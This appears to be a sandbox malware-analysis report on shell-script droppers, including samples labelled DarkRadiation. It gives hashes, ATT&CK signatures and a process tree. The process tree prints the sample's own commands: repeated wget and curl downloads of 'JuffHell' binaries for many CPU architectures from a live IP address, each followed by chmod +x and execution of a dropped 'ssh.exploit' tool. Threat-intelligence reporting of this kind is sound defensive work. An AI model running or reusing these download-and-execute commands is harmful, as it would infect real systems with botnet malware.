Overview
overview
10Static
static
1030c9166a9f...c55.sh
ubuntu-18.04-amd64
730c9166a9f...c55.sh
debian-9-armhf
730c9166a9f...c55.sh
debian-9-mips
730c9166a9f...c55.sh
debian-9-mipsel
73d93d26bca...b06.sh
ubuntu-18.04-amd64
33d93d26bca...b06.sh
debian-9-armhf
33d93d26bca...b06.sh
debian-9-mips
33d93d26bca...b06.sh
debian-9-mipsel
331.214.157...tor.sh
windows7-x64
331.214.157...tor.sh
windows10-2004-x64
331.214.157...tor.sh
windows7-x64
331.214.157...tor.sh
windows10-2004-x64
331.214.157...or1.sh
windows7-x64
331.214.157...or1.sh
windows10-2004-x64
331.214.157...ode.sh
windows7-x64
331.214.157...ode.sh
windows10-2004-x64
331.214.157...de1.sh
windows7-x64
331.214.157...de1.sh
windows10-2004-x64
331.214.157...rst.sh
ubuntu-18.04-amd64
731.214.157...rst.sh
debian-9-armhf
731.214.157...rst.sh
debian-9-mips
731.214.157...rst.sh
debian-9-mipsel
731.214.157...ond.sh
ubuntu-18.04-amd64
731.214.157...ond.sh
debian-9-armhf
731.214.157...ond.sh
debian-9-mips
731.214.157...ond.sh
debian-9-mipsel
731.214.157...pt3.sh
windows7-x64
331.214.157...pt3.sh
windows10-2004-x64
331.214.157...ile.sh
ubuntu-18.04-amd64
731.214.157...ile.sh
debian-9-armhf
731.214.157...ile.sh
debian-9-mips
731.214.157...ile.sh
debian-9-mipsel
7Analysis
-
max time kernel
33s -
max time network
34s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
14-10-2024 14:51
Behavioral task
behavioral1
Sample
30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral5
Sample
3d93d26bca6930823ec8b92e4b9c738c75b5a9285df077a9ff3bfbd60b5c6b06.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral6
Sample
3d93d26bca6930823ec8b92e4b9c738c75b5a9285df077a9ff3bfbd60b5c6b06.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral7
Sample
3d93d26bca6930823ec8b92e4b9c738c75b5a9285df077a9ff3bfbd60b5c6b06.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral8
Sample
3d93d26bca6930823ec8b92e4b9c738c75b5a9285df077a9ff3bfbd60b5c6b06.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral9
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/bash_decryptor.sh
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/bash_decryptor.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/bash_encryptor.sh
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/bash_encryptor.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/bash_encryptor1.sh
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/bash_encryptor1.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/code.sh
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/code.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/code1.sh
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/code1.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral20
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral21
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral22
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
Resource
debian9-mipsel-20240226-en
Behavioral task
behavioral23
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral24
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral25
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral26
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_second.sh
Resource
debian9-mipsel-20240418-en
Behavioral task
behavioral27
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt3.sh
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt3.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt_file.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral30
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt_file.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral31
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt_file.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral32
Sample
31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt_file.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
-
Size
3KB
-
MD5
4de883db50a87d2eaf32038a6f48a3cf
-
SHA1
5d786ee84056677315f5eb9315f7a40d7fe8cb94
-
SHA256
30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55
-
SHA512
36bee2e2e6850fd3fb99fe832fb3de0f4792ac2b6fc7dc24987f4efb53ab8e747e6ace4d518ac3e2efa62cf997e787be7107b28a2cf305b0f7d13bbace13631d
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 734 chmod 765 chmod 835 chmod 840 chmod 845 chmod 850 chmod 855 chmod 873 chmod 740 chmod 745 chmod 784 chmod 863 chmod 868 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/dayum0x1a5sfd15as1fa 735 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 741 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 747 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 767 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 785 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 836 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 841 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 846 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 851 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 856 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 864 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 869 dayum0x1a5sfd15as1fa /tmp/dayum0x1a5sfd15as1fa 874 dayum0x1a5sfd15as1fa -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 739 cat 736 wget 738 curl -
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/JuffHell.mips curl File opened for modification /tmp/JuffHell.m68k curl File opened for modification /tmp/JuffHell.sh4 curl File opened for modification /tmp/JuffHell.x86 curl File opened for modification /tmp/JuffHell.arm5 curl File opened for modification /tmp/JuffHell.arm6 curl File opened for modification /tmp/JuffHell.arm curl File opened for modification /tmp/JuffHell.mpsl curl File opened for modification /tmp/JuffHell.arm7 curl File opened for modification /tmp/dayum0x1a5sfd15as1fa 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh File opened for modification /tmp/JuffHell.spc curl File opened for modification /tmp/JuffHell.i686 curl File opened for modification /tmp/JuffHell.arc curl File opened for modification /tmp/JuffHell.ppc curl
Processes
-
/tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh/tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh1⤵
- Writes file to tmp directory
PID:706 -
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.x862⤵PID:711
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/catcat JuffHell.x862⤵PID:732
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:735
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.mips2⤵
- System Network Configuration Discovery
PID:736
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:738
-
-
/bin/catcat JuffHell.mips2⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:741
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.mpsl2⤵PID:742
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/catcat JuffHell.mpsl2⤵PID:744
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:747
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.arm2⤵PID:749
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/catcat JuffHell.arm2⤵PID:763
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:767
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.arm52⤵PID:768
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:777
-
-
/bin/catcat JuffHell.arm52⤵PID:782
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:785
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.arm62⤵PID:788
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/catcat JuffHell.arm62⤵PID:834
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:836
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.arm72⤵PID:837
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/catcat JuffHell.arm72⤵PID:839
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:841
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.ppc2⤵PID:842
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/catcat JuffHell.ppc2⤵PID:844
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:846
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.m68k2⤵PID:847
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/catcat JuffHell.m68k2⤵PID:849
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:851
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.spc2⤵PID:852
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/catcat JuffHell.spc2⤵PID:854
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86 systemd-private-0c8ba12b8aa244ffb88846861ae55d36-systemd-timedated.service-ZlB7LR2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:856
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.i6862⤵PID:857
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/catcat JuffHell.i6862⤵PID:862
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x862⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:864
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.sh42⤵PID:865
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/catcat JuffHell.sh42⤵PID:867
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x862⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:869
-
-
/usr/bin/wgetwget http://194.15.36.34/xxx9/JuffHell.arc2⤵PID:870
-
-
/usr/bin/curlcurl -O http://194.15.36.34/xxx9/JuffHell.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/catcat JuffHell.arc2⤵PID:872
-
-
/bin/chmodchmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arc JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x862⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/dayum0x1a5sfd15as1fa./dayum0x1a5sfd15as1fa ssh.exploit2⤵
- Executes dropped EXE
PID:874
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162B
MD54f8e702cc244ec5d4de32740c0ecbd97
SHA13adb1f02d5b6054de0046e367c1d687b6cdf7aff
SHA2569e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a
SHA51221047fea5269fee75a2a187aa09316519e35068cb2f2f76cfaf371e5224445e9d5c98497bd76fb9608d2b73e9dac1a3f5bfadfdc4623c479d53ecf93d81d3c9f